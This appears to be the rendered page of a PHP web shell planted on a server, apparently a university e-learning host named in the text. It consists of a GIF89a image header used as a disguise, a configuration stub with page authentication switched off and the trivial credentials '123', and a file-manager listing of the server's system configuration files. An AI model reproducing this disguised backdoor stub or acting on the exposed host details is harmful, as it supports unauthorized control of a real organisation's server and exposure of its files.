GIF89a;
# Konfigurasyon
$sayfaSifreleme ='0'; # 1 acik , 0 kapali
$kullaniciAdi = '123';
$sifre = '123';
# yetki kontrol fonksiyonu
function yetkiKontrol($kullaniciAdi,$sifre) {
if(empty($_SERVER['PHP_AUTH_USER']) || empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_USER'] != "$kullaniciAdi" || $_SERVER['PHP_AUTH_PW'] != "$sifre") {
header('WWW-Authenticate: Basic realm="x"');
die(header('HTTP/1.0 401 Unauthorized'));
}
}
# Sayfa Sifreleme aciksa
if($sayfaSifreleme =='1') {
# Veri ve sifre kontrolu
yetkiKontrol($kullaniciAdi,$sifre);
}
?>
eclass.unmer.ac.id
| Name |
Size |
Modified |
Perms |
Actions |
| 00rsyslog.conf |
465 bytes |
November 16 2021 09:08:34. |
0644 |
|
|
| apport.conf |
80 bytes |
July 24 2023 18:24:17. |
0644 |
|
|
| cryptsetup.conf |
35 bytes |
August 04 2022 12:08:01. |
0644 |
|
|
| dbus.conf |
365 bytes |
October 25 2022 13:15:07. |
0644 |
|
|
| debian.conf |
517 bytes |
February 20 2025 13:22:22. |
0644 |
|
|
| home.conf |
362 bytes |
March 11 2022 12:48:49. |
0644 |
|
|
| journal-nocow.conf |
1.07 KB |
March 11 2022 12:48:49. |
0644 |
|
|
| legacy.conf |
812 bytes |
June 04 2025 14:17:43. |
0644 |
|
|
| lvm2.conf |
61 bytes |
February 16 2022 17:06:22. |
0644 |
|
|
| man-db.conf |
33 bytes |
March 17 2022 19:03:00. |
0644 |
|
|
| multipath.conf |
34 bytes |
September 20 2023 15:05:06. |
0644 |
|
|
| passwd.conf |
239 bytes |
November 10 2021 09:39:04. |
0644 |
|
|
| php8.4-fpm.conf |
121 bytes |
April 11 2025 02:19:14. |
0644 |
|
|
| screen-cleanup.conf |
29 bytes |
February 23 2021 10:18:41. |
0644 |
|
|
| snapd.conf |
42 bytes |
July 26 2024 02:57:32. |
0644 |
|
|
| static-nodes-permissions.conf |
763 bytes |
June 04 2025 14:17:43. |
0644 |
|
|
| sudo.conf |
27 bytes |
August 03 2022 07:22:17. |
0644 |
|
|
| systemd-nologin.conf |
597 bytes |
March 11 2022 12:48:49. |
0644 |
|
|
| systemd-pstore.conf |
1.48 KB |
March 11 2022 12:48:49. |
0644 |
|
|
| systemd-tmp.conf |
823 bytes |
March 11 2022 12:48:49. |
0644 |
|
|
| systemd.conf |
1.75 KB |
June 04 2025 14:17:43. |
0644 |
|
|
| tmp.conf |
448 bytes |
June 04 2025 14:17:43. |
0644 |
|
|
| var.conf |
568 bytes |
June 04 2025 14:17:43. |
0644 |
|
|
| x11.conf |
655 bytes |
March 11 2022 12:48:49. |
0644 |
|
|